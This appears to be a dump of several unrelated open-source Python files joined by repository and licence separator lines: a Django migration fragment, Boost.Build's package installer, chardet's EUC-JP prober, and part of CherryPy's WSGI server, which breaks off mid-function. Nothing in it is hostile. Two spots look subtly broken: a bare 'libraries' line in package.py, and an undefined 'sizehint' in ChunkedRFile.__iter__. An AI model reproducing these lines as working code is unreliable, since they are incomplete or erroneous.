'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'device_owner': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'firewall_profile': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'mac': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'machine': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'nics'", 'to': "orm['db.VirtualMachine']"}),
'name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '128', 'null': 'True'}),
'network': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'nics'", 'to': "orm['db.Network']"}),
'security_groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['db.SecurityGroup']", 'null': 'True', 'symmetrical': 'False'}),
'state': ('django.db.models.fields.CharField', [], {'default': "'ACTIVE'", 'max_length': '32'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'userid': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'})
},
'db.quotaholderserial': {
'Meta': {'ordering': "['serial']", 'object_name': 'QuotaHolderSerial'},
'accept': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'pending': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'resolved': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'serial': ('django.db.models.fields.BigIntegerField', [], {'primary_key': 'True', 'db_index': 'True'})
},
'db.securitygroup': {
'Meta': {'object_name': 'SecurityGroup'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'db.subnet': {
'Meta': {'object_name': 'Subnet'},
'cidr': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'dhcp': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'dns_nameservers': ('synnefo.db.fields.SeparatedValuesField', [], {'null': 'True'}),
'gateway': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'host_routes': ('synnefo.db.fields.SeparatedValuesField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ipversion': ('django.db.models.fields.IntegerField', [], {'default': '4'}),
'name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '128', 'null': 'True'}),
'network': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'subnets'", 'to': "orm['db.Network']"})
},
'db.virtualmachine': {
'Meta': {'object_name': 'VirtualMachine'},
'action': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '30', 'null': 'True'}),
'backend': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'virtual_machines'", 'null': 'True', 'on_delete': 'models.PROTECT', 'to': "orm['db.Backend']"}),
'backend_hash': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'backendjobid': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True'}),
'backendjobstatus': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True'}),
'backendlogmsg': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'backendopcode': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True'}),
'backendtime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(1, 1, 1, 0, 0)'}),
'buildpercentage': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'flavor': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['db.Flavor']", 'on_delete': 'models.PROTECT'}),
'hostid': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'imageid': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'operstate': ('django.db.models.fields.CharField', [], {'default': "'BUILD'", 'max_length': '30'}),
'serial': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'virtual_machine'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['db.QuotaHolderSerial']"}),
'suspended': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'task': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'task_job_id': ('django.db.models.fields.BigIntegerField', [], {'null': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'userid': ('django.db.models.fields.CharField', [], {'max_length': '100', 'db_index': 'True'})
},
'db.virtualmachinediagnostic': {
'Meta': {'ordering': "['-created']", 'object_name': 'VirtualMachineDiagnostic'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'details': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'machine': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'diagnostics'", 'to': "orm['db.VirtualMachine']"}),
'message': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'source_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True'})
},
'db.virtualmachinemetadata': {
'Meta': {'unique_together': "(('meta_key', 'vm'),)", 'object_name': 'VirtualMachineMetadata'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'meta_key': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'meta_value': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'vm': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'metadata'", 'to': "orm['db.VirtualMachine']"})
}
}
complete_apps = ['db'] | gpl-3.0 |
ycsoft/FatCat-Server | LIBS/boost_1_58_0/tools/build/src/tools/package.py | 9 | 6990 | # Status: ported
# Base revision: 64488
#
# Copyright (c) 2005, 2010 Vladimir Prus.
# Copyright 2006 Rene Rivera.
#
# Use, modification and distribution is subject to the Boost Software
# License Version 1.0. (See accompanying file LICENSE_1_0.txt or
# http://www.boost.org/LICENSE_1_0.txt)
# Provides mechanism for installing whole packages into a specific directory
# structure. This is opposed to the 'install' rule, that installs a number of
# targets to a single directory, and does not care about directory structure at
# all.
# Example usage:
#
# package.install boost : <properties>
# : <binaries>
# : <libraries>
# : <headers>
# ;
#
# This will install binaries, libraries and headers to the 'proper' location,
# given by command line options --prefix, --exec-prefix, --bindir, --libdir and
# --includedir.
#
# The rule is just a convenient wrapper, avoiding the need to define several
# 'install' targets.
#
# The only install-related feature is <install-source-root>. It will apply to
# headers only and if present, paths of headers relatively to source root will
# be retained after installing. If it is not specified, then "." is assumed, so
# relative paths in headers are always preserved.
import b2.build.feature as feature
import b2.build.property as property
import b2.util.option as option
import b2.tools.stage as stage
from b2.build.alias import alias
from b2.manager import get_manager
from b2.util import bjam_signature
from b2.util.utility import ungrist
import os
feature.feature("install-default-prefix", [], ["free", "incidental"])
@bjam_signature((["name", "package_name", "?"], ["requirements", "*"],
["binaries", "*"], ["libraries", "*"], ["headers", "*"]))
def install(name, package_name=None, requirements=[], binaries=[], libraries=[], headers=[]):
requirements = requirements[:]
binaries = binaries[:]
libraries
if not package_name:
package_name = name
if option.get("prefix"):
# If --prefix is explicitly specified on the command line,
# then we need wipe away any settings of libdir/includir that
# is specified via options in config files.
option.set("bindir", None)
option.set("libdir", None)
option.set("includedir", None)
# If <install-source-root> is not specified, all headers are installed to
# prefix/include, no matter what their relative path is. Sometimes that is
# what is needed.
install_source_root = property.select('install-source-root', requirements)
if install_source_root:
requirements = property.change(requirements, 'install-source-root', None)
install_header_subdir = property.select('install-header-subdir', requirements)
if install_header_subdir:
install_header_subdir = ungrist(install_header_subdir[0])
requirements = property.change(requirements, 'install-header-subdir', None)
# First, figure out all locations. Use the default if no prefix option
# given.
prefix = get_prefix(name, requirements)
# Architecture dependent files.
exec_locate = option.get("exec-prefix", prefix)
# Binaries.
bin_locate = option.get("bindir", os.path.join(prefix, "bin"))
# Object code libraries.
lib_locate = option.get("libdir", os.path.join(prefix, "lib"))
# Source header files.
include_locate = option.get("includedir", os.path.join(prefix, "include"))
stage.install(name + "-bin", binaries, requirements + ["<location>" + bin_locate])
alias(name + "-lib", [name + "-lib-shared", name + "-lib-static"])
# Since the install location of shared libraries differs on universe
# and cygwin, use target alternatives to make different targets.
# We should have used indirection conditioanl requirements, but it's
# awkward to pass bin-locate and lib-locate from there to another rule.
alias(name + "-lib-shared", [name + "-lib-shared-universe"])
alias(name + "-lib-shared", [name + "-lib-shared-cygwin"], ["<target-os>cygwin"])
# For shared libraries, we install both explicitly specified one and the
# shared libraries that the installed executables depend on.
stage.install(name + "-lib-shared-universe", binaries + libraries,
requirements + ["<location>" + lib_locate, "<install-dependencies>on",
"<install-type>SHARED_LIB"])
stage.install(name + "-lib-shared-cygwin", binaries + libraries,
requirements + ["<location>" + bin_locate, "<install-dependencies>on",
"<install-type>SHARED_LIB"])
# For static libraries, we do not care about executable dependencies, since
# static libraries are already incorporated into them.
stage.install(name + "-lib-static", libraries, requirements +
["<location>" + lib_locate, "<install-dependencies>on", "<install-type>STATIC_LIB"])
stage.install(name + "-headers", headers, requirements \
+ ["<location>" + os.path.join(include_locate, s) for s in install_header_subdir]
+ install_source_root)
alias(name, [name + "-bin", name + "-lib", name + "-headers"])
pt = get_manager().projects().current()
for subname in ["bin", "lib", "headers", "lib-shared", "lib-static", "lib-shared-universe", "lib-shared-cygwin"]:
pt.mark_targets_as_explicit([name + "-" + subname])
@bjam_signature((["target_name"], ["package_name"], ["data", "*"], ["requirements", "*"]))
def install_data(target_name, package_name, data, requirements):
if not package_name:
package_name = target_name
if option.get("prefix"):
# If --prefix is explicitly specified on the command line,
# then we need wipe away any settings of datarootdir
option.set("datarootdir", None)
prefix = get_prefix(package_name, requirements)
datadir = option.get("datarootdir", os.path.join(prefix, "share"))
stage.install(target_name, data,
requirements + ["<location>" + os.path.join(datadir, package_name)])
get_manager().projects().current().mark_targets_as_explicit([target_name])
def get_prefix(package_name, requirements):
specified = property.select("install-default-prefix", requirements)
if specified:
specified = ungrist(specified[0])
prefix = option.get("prefix", specified)
requirements = property.change(requirements, "install-default-prefix", None)
# Or some likely defaults if neither is given.
if not prefix:
if os.name == "nt":
prefix = "C:\\" + package_name
elif os.name == "posix":
prefix = "/usr/local"
return prefix
| mit |
heeraj123/oh-mainline | vendor/packages/requests/requests/packages/chardet/eucjpprober.py | 2919 | 3678 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is mozilla.org code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from . import constants
from .mbcharsetprober import MultiByteCharSetProber
from .codingstatemachine import CodingStateMachine
from .chardistribution import EUCJPDistributionAnalysis
from .jpcntx import EUCJPContextAnalysis
from .mbcssm import EUCJPSMModel
class EUCJPProber(MultiByteCharSetProber):
def __init__(self):
MultiByteCharSetProber.__init__(self)
self._mCodingSM = CodingStateMachine(EUCJPSMModel)
self._mDistributionAnalyzer = EUCJPDistributionAnalysis()
self._mContextAnalyzer = EUCJPContextAnalysis()
self.reset()
def reset(self):
MultiByteCharSetProber.reset(self)
self._mContextAnalyzer.reset()
def get_charset_name(self):
return "EUC-JP"
def feed(self, aBuf):
aLen = len(aBuf)
for i in range(0, aLen):
# PY3K: aBuf is a byte array, so aBuf[i] is an int, not a byte
codingState = self._mCodingSM.next_state(aBuf[i])
if codingState == constants.eError:
if constants._debug:
sys.stderr.write(self.get_charset_name()
+ ' prober hit error at byte ' + str(i)
+ '\n')
self._mState = constants.eNotMe
break
elif codingState == constants.eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == constants.eStart:
charLen = self._mCodingSM.get_current_charlen()
if i == 0:
self._mLastChar[1] = aBuf[0]
self._mContextAnalyzer.feed(self._mLastChar, charLen)
self._mDistributionAnalyzer.feed(self._mLastChar, charLen)
else:
self._mContextAnalyzer.feed(aBuf[i - 1:i + 1], charLen)
self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1],
charLen)
self._mLastChar[0] = aBuf[aLen - 1]
if self.get_state() == constants.eDetecting:
if (self._mContextAnalyzer.got_enough_data() and
(self.get_confidence() > constants.SHORTCUT_THRESHOLD)):
self._mState = constants.eFoundIt
return self.get_state()
def get_confidence(self):
contxtCf = self._mContextAnalyzer.get_confidence()
distribCf = self._mDistributionAnalyzer.get_confidence()
return max(contxtCf, distribCf)
| agpl-3.0 |
commshare/testLiveSRS | trunk/objs/CherryPy-3.2.4/build/lib.linux-armv7l-2.7/cherrypy/wsgiserver/wsgiserver2.py | 19 | 87973 | """A high-speed, production ready, thread pooled, generic HTTP server.
Simplest example on how to use this module directly
(without using CherryPy's application machinery)::
from cherrypy import wsgiserver
def my_crazy_app(environ, start_response):
status = '200 OK'
response_headers = [('Content-type','text/plain')]
start_response(status, response_headers)
return ['Hello world!']
server = wsgiserver.CherryPyWSGIServer(
('0.0.0.0', 8070), my_crazy_app,
server_name='www.cherrypy.example')
server.start()
The CherryPy WSGI server can serve as many WSGI applications
as you want in one instance by using a WSGIPathInfoDispatcher::
d = WSGIPathInfoDispatcher({'/': my_crazy_app, '/blog': my_blog_app})
server = wsgiserver.CherryPyWSGIServer(('0.0.0.0', 80), d)
Want SSL support? Just set server.ssl_adapter to an SSLAdapter instance.
This won't call the CherryPy engine (application side) at all, only the
HTTP server, which is independent from the rest of CherryPy. Don't
let the name "CherryPyWSGIServer" throw you; the name merely reflects
its origin, not its coupling.
For those of you wanting to understand internals of this module, here's the
basic call flow. The server's listening thread runs a very tight loop,
sticking incoming connections onto a Queue::
server = CherryPyWSGIServer(...)
server.start()
while True:
tick()
# This blocks until a request comes in:
child = socket.accept()
conn = HTTPConnection(child, ...)
server.requests.put(conn)
Worker threads are kept in a pool and poll the Queue, popping off and then
handling each connection in turn. Each connection can consist of an arbitrary
number of requests and their responses, so we run a nested loop::
while True:
conn = server.requests.get()
conn.communicate()
-> while True:
req = HTTPRequest(...)
req.parse_request()
-> # Read the Request-Line, e.g. "GET /page HTTP/1.1"
req.rfile.readline()
read_headers(req.rfile, req.inheaders)
req.respond()
-> response = app(...)
try:
for chunk in response:
if chunk:
req.write(chunk)
finally:
if hasattr(response, "close"):
response.close()
if req.close_connection:
return
"""
__all__ = ['HTTPRequest', 'HTTPConnection', 'HTTPServer',
'SizeCheckWrapper', 'KnownLengthRFile', 'ChunkedRFile',
'CP_fileobject',
'MaxSizeExceeded', 'NoSSLError', 'FatalSSLAlert',
'WorkerThread', 'ThreadPool', 'SSLAdapter',
'CherryPyWSGIServer',
'Gateway', 'WSGIGateway', 'WSGIGateway_10', 'WSGIGateway_u0',
'WSGIPathInfoDispatcher', 'get_ssl_adapter_class']
import os
try:
import queue
except:
import Queue as queue
import re
import rfc822
import socket
import sys
if 'win' in sys.platform and not hasattr(socket, 'IPPROTO_IPV6'):
socket.IPPROTO_IPV6 = 41
try:
import cStringIO as StringIO
except ImportError:
import StringIO
DEFAULT_BUFFER_SIZE = -1
_fileobject_uses_str_type = isinstance(socket._fileobject(None)._rbuf, basestring)
import threading
import time
import traceback
def format_exc(limit=None):
"""Like print_exc() but return a string. Backport for Python 2.3."""
try:
etype, value, tb = sys.exc_info()
return ''.join(traceback.format_exception(etype, value, tb, limit))
finally:
etype = value = tb = None
import operator
from urllib import unquote
import warnings
if sys.version_info >= (3, 0):
bytestr = bytes
unicodestr = str
basestring = (bytes, str)
def ntob(n, encoding='ISO-8859-1'):
"""Return the given native string as a byte string in the given encoding."""
# In Python 3, the native string type is unicode
return n.encode(encoding)
else:
bytestr = str
unicodestr = unicode
basestring = basestring
def ntob(n, encoding='ISO-8859-1'):
"""Return the given native string as a byte string in the given encoding."""
# In Python 2, the native string type is bytes. Assume it's already
# in the given encoding, which for ISO-8859-1 is almost always what
# was intended.
return n
LF = ntob('\n')
CRLF = ntob('\r\n')
TAB = ntob('\t')
SPACE = ntob(' ')
COLON = ntob(':')
SEMICOLON = ntob(';')
EMPTY = ntob('')
NUMBER_SIGN = ntob('#')
QUESTION_MARK = ntob('?')
ASTERISK = ntob('*')
FORWARD_SLASH = ntob('/')
quoted_slash = re.compile(ntob("(?i)%2F"))
import errno
def plat_specific_errors(*errnames):
"""Return error numbers for all errors in errnames on this platform.
The 'errno' module contains different global constants depending on
the specific platform (OS). This function will return the list of
numeric values for a given list of potential names.
"""
errno_names = dir(errno)
nums = [getattr(errno, k) for k in errnames if k in errno_names]
# de-dupe the list
return list(dict.fromkeys(nums).keys())
socket_error_eintr = plat_specific_errors("EINTR", "WSAEINTR")
socket_errors_to_ignore = plat_specific_errors(
"EPIPE",
"EBADF", "WSAEBADF",
"ENOTSOCK", "WSAENOTSOCK",
"ETIMEDOUT", "WSAETIMEDOUT",
"ECONNREFUSED", "WSAECONNREFUSED",
"ECONNRESET", "WSAECONNRESET",
"ECONNABORTED", "WSAECONNABORTED",
"ENETRESET", "WSAENETRESET",
"EHOSTDOWN", "EHOSTUNREACH",
)
socket_errors_to_ignore.append("timed out")
socket_errors_to_ignore.append("The read operation timed out")
socket_errors_nonblocking = plat_specific_errors(
'EAGAIN', 'EWOULDBLOCK', 'WSAEWOULDBLOCK')
comma_separated_headers = [ntob(h) for h in
['Accept', 'Accept-Charset', 'Accept-Encoding',
'Accept-Language', 'Accept-Ranges', 'Allow', 'Cache-Control',
'Connection', 'Content-Encoding', 'Content-Language', 'Expect',
'If-Match', 'If-None-Match', 'Pragma', 'Proxy-Authenticate', 'TE',
'Trailer', 'Transfer-Encoding', 'Upgrade', 'Vary', 'Via', 'Warning',
'WWW-Authenticate']]
import logging
if not hasattr(logging, 'statistics'): logging.statistics = {}
def read_headers(rfile, hdict=None):
"""Read headers from the given stream into the given header dict.
If hdict is None, a new header dict is created. Returns the populated
header dict.
Headers which are repeated are folded together using a comma if their
specification so dictates.
This function raises ValueError when the read bytes violate the HTTP spec.
You should probably return "400 Bad Request" if this happens.
"""
if hdict is None:
hdict = {}
while True:
line = rfile.readline()
if not line:
# No more data--illegal end of headers
raise ValueError("Illegal end of headers.")
if line == CRLF:
# Normal end of headers
break
if not line.endswith(CRLF):
raise ValueError("HTTP requires CRLF terminators")
if line[0] in (SPACE, TAB):
# It's a continuation line.
v = line.strip()
else:
try:
k, v = line.split(COLON, 1)
except ValueError:
raise ValueError("Illegal header line.")
# TODO: what about TE and WWW-Authenticate?
k = k.strip().title()
v = v.strip()
hname = k
if k in comma_separated_headers:
existing = hdict.get(hname)
if existing:
v = ", ".join((existing, v))
hdict[hname] = v
return hdict
class MaxSizeExceeded(Exception):
pass
class SizeCheckWrapper(object):
"""Wraps a file-like object, raising MaxSizeExceeded if too large."""
def __init__(self, rfile, maxlen):
self.rfile = rfile
self.maxlen = maxlen
self.bytes_read = 0
def _check_length(self):
if self.maxlen and self.bytes_read > self.maxlen:
raise MaxSizeExceeded()
def read(self, size=None):
data = self.rfile.read(size)
self.bytes_read += len(data)
self._check_length()
return data
def readline(self, size=None):
if size is not None:
data = self.rfile.readline(size)
self.bytes_read += len(data)
self._check_length()
return data
# User didn't specify a size ...
# We read the line in chunks to make sure it's not a 100MB line !
res = []
while True:
data = self.rfile.readline(256)
self.bytes_read += len(data)
self._check_length()
res.append(data)
# See http://www.cherrypy.org/ticket/421
if len(data) < 256 or data[-1:] == "\n":
return EMPTY.join(res)
def readlines(self, sizehint=0):
# Shamelessly stolen from StringIO
total = 0
lines = []
line = self.readline()
while line:
lines.append(line)
total += len(line)
if 0 < sizehint <= total:
break
line = self.readline()
return lines
def close(self):
self.rfile.close()
def __iter__(self):
return self
def __next__(self):
data = next(self.rfile)
self.bytes_read += len(data)
self._check_length()
return data
def next(self):
data = self.rfile.next()
self.bytes_read += len(data)
self._check_length()
return data
class KnownLengthRFile(object):
"""Wraps a file-like object, returning an empty string when exhausted."""
def __init__(self, rfile, content_length):
self.rfile = rfile
self.remaining = content_length
def read(self, size=None):
if self.remaining == 0:
return ''
if size is None:
size = self.remaining
else:
size = min(size, self.remaining)
data = self.rfile.read(size)
self.remaining -= len(data)
return data
def readline(self, size=None):
if self.remaining == 0:
return ''
if size is None:
size = self.remaining
else:
size = min(size, self.remaining)
data = self.rfile.readline(size)
self.remaining -= len(data)
return data
def readlines(self, sizehint=0):
# Shamelessly stolen from StringIO
total = 0
lines = []
line = self.readline(sizehint)
while line:
lines.append(line)
total += len(line)
if 0 < sizehint <= total:
break
line = self.readline(sizehint)
return lines
def close(self):
self.rfile.close()
def __iter__(self):
return self
def __next__(self):
data = next(self.rfile)
self.remaining -= len(data)
return data
class ChunkedRFile(object):
"""Wraps a file-like object, returning an empty string when exhausted.
This class is intended to provide a conforming wsgi.input value for
request entities that have been encoded with the 'chunked' transfer
encoding.
"""
def __init__(self, rfile, maxlen, bufsize=8192):
self.rfile = rfile
self.maxlen = maxlen
self.bytes_read = 0
self.buffer = EMPTY
self.bufsize = bufsize
self.closed = False
def _fetch(self):
if self.closed:
return
line = self.rfile.readline()
self.bytes_read += len(line)
if self.maxlen and self.bytes_read > self.maxlen:
raise MaxSizeExceeded("Request Entity Too Large", self.maxlen)
line = line.strip().split(SEMICOLON, 1)
try:
chunk_size = line.pop(0)
chunk_size = int(chunk_size, 16)
except ValueError:
raise ValueError("Bad chunked transfer size: " + repr(chunk_size))
if chunk_size <= 0:
self.closed = True
return
## if line: chunk_extension = line[0]
if self.maxlen and self.bytes_read + chunk_size > self.maxlen:
raise IOError("Request Entity Too Large")
chunk = self.rfile.read(chunk_size)
self.bytes_read += len(chunk)
self.buffer += chunk
crlf = self.rfile.read(2)
if crlf != CRLF:
raise ValueError(
"Bad chunked transfer coding (expected '\\r\\n', "
"got " + repr(crlf) + ")")
def read(self, size=None):
data = EMPTY
while True:
if size and len(data) >= size:
return data
if not self.buffer:
self._fetch()
if not self.buffer:
# EOF
return data
if size:
remaining = size - len(data)
data += self.buffer[:remaining]
self.buffer = self.buffer[remaining:]
else:
data += self.buffer
def readline(self, size=None):
data = EMPTY
while True:
if size and len(data) >= size:
return data
if not self.buffer:
self._fetch()
if not self.buffer:
# EOF
return data
newline_pos = self.buffer.find(LF)
if size:
if newline_pos == -1:
remaining = size - len(data)
data += self.buffer[:remaining]
self.buffer = self.buffer[remaining:]
else:
remaining = min(size - len(data), newline_pos)
data += self.buffer[:remaining]
self.buffer = self.buffer[remaining:]
else:
if newline_pos == -1:
data += self.buffer
else:
data += self.buffer[:newline_pos]
self.buffer = self.buffer[newline_pos:]
def readlines(self, sizehint=0):
# Shamelessly stolen from StringIO
total = 0
lines = []
line = self.readline(sizehint)
while line:
lines.append(line)
total += len(line)
if 0 < sizehint <= total:
break
line = self.readline(sizehint)
return lines
def read_trailer_lines(self):
if not self.closed:
raise ValueError(
"Cannot read trailers until the request body has been read.")
while True:
line = self.rfile.readline()
if not line:
# No more data--illegal end of headers
raise ValueError("Illegal end of headers.")
self.bytes_read += len(line)
if self.maxlen and self.bytes_read > self.maxlen:
raise IOError("Request Entity Too Large")
if line == CRLF:
# Normal end of headers
break
if not line.endswith(CRLF):
raise ValueError("HTTP requires CRLF terminators")
yield line
def close(self):
self.rfile.close()
def __iter__(self):
# Shamelessly stolen from StringIO
total = 0
line = self.readline(sizehint)
while line:
yield line
total += len(line)
if 0 < sizehint <= total:
break
line = self.readline(sizehint)
class HTTPRequest(object):
"""An HTTP Request (and response).
A single HTTP connection may consist of multiple request/response pairs.
"""
server = None
"""The HTTPServer object which is receiving this request."""
conn = None
"""The HTTPConnection object on which this request connected."""
inheaders = {}
"""A dict of request headers."""
outheaders = []
"""A list of header tuples to write in the response."""
ready = False
"""When True, the request has been parsed and is ready to begin generating
the response. When False, signals the calling Connection that the response
should not be generated and the connection should close."""
close_connection = False
"""Signals the calling Connection that the request should close. This does
not imply an error! The client and/or server may each request that the
connection be closed."""
chunked_write = False
"""If True, output will be encoded with the "chunked" transfer-coding.
This value is set automatically inside send_headers."""
def __init__(self, server, conn):
self.server= server
self.conn = conn
self.ready = False
self.started_request = False
self.scheme = ntob("http")
if self.server.ssl_adapter is not None:
self.scheme = ntob("https")
# Use the lowest-common protocol in case read_request_line errors.
self.response_protocol = 'HTTP/1.0'
self.inheaders = {}
self.status = ""
self.outheaders = []
self.sent_headers = False
self.close_connection = self.__class__.close_connection
self.chunked_read = False
self.chunked_write = self.__class__.chunked_write
def parse_request(self):
"""Parse the next HTTP request start-line and message-headers."""
self.rfile = SizeCheckWrapper(self.conn.rfile,
self.server.max_request_header_size)
try:
success = self.read_request_line()
except MaxSizeExceeded:
self.simple_response("414 Request-URI Too Long",
"The Request-URI sent with the request exceeds the maximum "
"allowed bytes.")
return
else:
if not success:
return
try:
success = self.read_request_headers()
except MaxSizeExceeded:
self.simple_response("413 Request Entity Too Large",
"The headers sent with the request exceed the maximum "
"allowed bytes.")
return
else:
if not success:
return
self.ready = True
def read_request_line(self):
# HTTP/1.1 connections are persistent by default. If a client
# requests a page, then idles (leaves the connection open),
# then rfile.readline() will raise socket.error("timed out").
# Note that it does this based on the value given to settimeout(),
# and doesn't need the client to request or acknowledge the close
# (although your TCP stack might suffer for it: cf Apache's history
# with FIN_WAIT_2).
request_line = self.rfile.readline()
# Set started_request to True so communicate() knows to send 408
# from here on out.
self.started_request = True
if not request_line:
return False
if request_line == CRLF:
# RFC 2616 sec 4.1: "...if the server is reading the protocol
# stream at the beginning of a message and receives a CRLF
# first, it should ignore the CRLF."
# But only ignore one leading line! else we enable a DoS.
request_line = self.rfile.readline()
if not request_line:
return False
if not request_line.endswith(CRLF):
self.simple_response("400 Bad Request", "HTTP requires CRLF terminators")
return False
try:
method, uri, req_protocol = request_line.strip().split(SPACE, 2)
rp = int(req_protocol[5]), int(req_protocol[7])
except (ValueError, IndexError):
self.simple_response("400 Bad Request", "Malformed Request-Line")
return False
self.uri = uri
self.method = method
# uri may be an abs_path (including "http://host.domain.tld");
scheme, authority, path = self.parse_request_uri(uri)
if NUMBER_SIGN in path:
self.simple_response("400 Bad Request",
"Illegal #fragment in Request-URI.")
return False
if scheme:
self.scheme = scheme
qs = EMPTY
if QUESTION_MARK in path:
path, qs = path.split(QUESTION_MARK, 1)
# Unquote the path+params (e.g. "/this%20path" -> "/this path").
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec5.html#sec5.1.2
#
# But note that "...a URI must be separated into its components
# before the escaped characters within those components can be
# safely decoded." http://www.ietf.org/rfc/rfc2396.txt, sec 2.4.2
# Therefore, "/this%2Fpath" becomes "/this%2Fpath", not "/this/path".
try:
atoms = [unquote(x) for x in quoted_slash.split(path)]
except ValueError:
ex = sys.exc_info()[1]
self.simple_response("400 Bad Request", ex.args[0])
return False
path = "%2F".join(atoms)
self.path = path
# Note that, like wsgiref and most other HTTP servers,
# we "% HEX HEX"-unquote the path but not the query string.
self.qs = qs
# Compare request and server HTTP protocol versions, in case our
# server does not support the requested protocol. Limit our output
# to min(req, server). We want the following output:
# request server actual written supported response
# protocol protocol response protocol feature set
# a 1.0 1.0 1.0 1.0
# b 1.0 1.1 1.1 1.0
# c 1.1 1.0 1.0 1.0
# d 1.1 1.1 1.1 1.1
# Notice that, in (b), the response will be "HTTP/1.1" even though
# the client only understands 1.0. RFC 2616 10.5.6 says we should
# only return 505 if the _major_ version is different.
sp = int(self.server.protocol[5]), int(self.server.protocol[7])
if sp[0] != rp[0]:
self.simple_response("505 HTTP Version Not Supported")
return False
self.request_protocol = req_protocol
self.response_protocol = "HTTP/%s.%s" % min(rp, sp)
return True
def read_request_headers(self):
"""Read self.rfile into self.inheaders. Return success."""
# then all the http headers
try:
read_headers(self.rfile, self.inheaders)
except ValueError:
ex = sys.exc_info()[1]
self.simple_response("400 Bad Request", ex.args[0])
return False
mrbs = self.server.max_request_body_size
if mrbs and int(self.inheaders.get("Content-Length", 0)) > mrbs:
self.simple_response("413 Request Entity Too Large",
"The entity sent with the request exceeds the maximum "
"allowed bytes.")
return False
# Persistent connection support
if self.response_protocol == "HTTP/1.1":
# Both server and client are HTTP/1.1
if self.inheaders.get("Connection", "") == "close":
self.close_connection = True
else:
# Either the server or client (or both) are HTTP/1.0
if self.inheaders.get("Connection", "") != "Keep-Alive":
self.close_connection = True
# Transfer-Encoding support
te = None
if self.response_protocol == "HTTP/1.1":
te = self.inheaders.get("Transfer-Encoding")
if te:
te = [x.strip().lower() for x in te.split(",") if x.strip()]
self.chunked_read = False
if te:
for enc in te:
if enc == "chunked":
self.chunked_read = True
else:
# Note that, even if we see "chunked", we must reject
# if there is an extension we don't recognize.
